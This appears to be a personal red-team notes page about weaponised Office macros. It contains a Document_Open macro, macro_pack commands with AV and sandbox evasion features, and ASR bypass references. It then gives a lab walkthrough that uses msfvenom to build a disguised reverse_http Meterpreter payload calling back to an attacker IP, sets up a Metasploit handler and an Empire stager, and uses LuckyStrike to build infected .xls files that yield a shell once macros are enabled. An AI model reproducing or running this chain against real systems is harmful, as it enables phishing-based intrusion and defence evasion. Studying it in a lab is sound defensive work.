Marco

Wrap arround
#

Execl
#

MS Word
#

Private Sub Document_Open()
  MsgBox "game over", vbOKOnly, "game over"
  a = Shell("calc.exe", vbHide)
End Sub

ALT + F11 Save as .dotm Enable Content

ASR (Attack surface reduction)
#

Attack surface reduction rules overview

Attack surface reduction rules reference

Introduced as part of Windows Defender Exploit Guard in Windows 10 1709.

A set of rules

Group Policy Objects

Some very efficient

Ex. Block all Office Applications from creating child processes.
Potential to block 99.9% of all marco based attacks in the wild.

ASR bypass
#

ASR Rules Bypass.vba

Windows Defender Exploit Guard ASR VBScript/JS Rule

Windows Defender Exploit Guard ASR Rules for Office

Generate-Macro
#

Tested on Windows 10 with O365 Home Premium (M365).

During execution, the payload was detected and terminated quickly by built-in antivirus/defender.

(Correct me if I’m wrong or if you’ve observed different behavior.)

marco_pack
#

Using tool macro_pack/community , more detail at blog EXCEL 4.0 XLM macro in MacroPack Pro

Example echo "cmd.exe /c notepad.exe" | macro_pack.exe -o -t CMD -G test.xls

Some security bypass features:

Some Anti Reverse
- Sandbox detection
- Hiding macro sheet
- Obfuscation
XLM InjectionXLM Injection

This is the community edition. The Pro version unlocks advanced features such as shellcode injection, seamless Meterpreter integration, and extended exploitation capabilities.....

Lucky Strike + Powershell Empire
#

Attacker IP (Kali): 192.168.50.2

Victim IP (Windows 10): 192.168.50.3

In this section, I would use both meterpreter and empire

Malicious Server Deployment
#

Meterpreter
#

$ msfvenom -p windows/meterpreter/reverse_http LPORT=8080 LHOST=192.168.50.2 -f exe -o CheckGrammar.exe

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 192.168.50.2
LHOST => 192.168.50.2
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run
[*] Started HTTP reverse handler on http://192.168.50.2:8080

Empire
#

I use Kali, so this is easy to install empire-starkiller

After that, run with

sudo powershell-empire server

Default admin account

Username: empireadmin

Password: password123

Create Listener
#

Create Stager
#

Create new stager Set listener to http that just created in the previous step Enable Obfuscate mode Download this payload

LuckyStrike
#

Transfer file to vicim machine, there are multiples ways to do this, but I interested in using http server

python -m http.server 8000

Prepare environment
#

Invoke-Obfuscation

Import module Invoke-Obfuscation Install luckystrike Invoke-Obfuscation Error in finding module Find PSModulePath Copy / Move Invoke-Obfuscation folder to one of these paths

Create .xls
#

Meterpreter
#

Create payload from malicious exe for reverse http (meterpreter) Configure payload Generate file .xls

Empire
#

Create payload from malicious exe for reverse http (empire) Configure payload Generate file .xls

Open .xls
#

infected_fNKLTJYV.xls (meterpreter)
#

Clink enable marco Get shell

infected_fNKLTJYV.xls (empire)
#

Open file Add agent Terminal File Browser

Attack Rating
#

High Realism: Macro-based attacks continue to appear in real-world incidents, targeting both IT and non-IT staff.
Social Engineering Factor: Success often relies on persuading the user to click Enable Content, a surprisingly common behavior in corporate environments.
Critical Risk: If macros are enabled by default (or policies are poorly enforced), the attack vector becomes a severe vulnerability.
Bypassing Defenses: With obfuscation, sandbox detection, and sheet-hiding techniques, many traditional antivirus solutions can be evaded. Advanced variants also bypass some EDR tools by injecting into trusted processes.
Persistence & Payload Delivery: Weaponized macros can be chained to download and execute secondary payloads (e.g., Meterpreter, Cobalt Strike), establishing long-term access.
Detection Difficulty: When combined with living-off-the-land techniques (e.g., abusing PowerShell or WMI), attribution and detection become harder for defenders.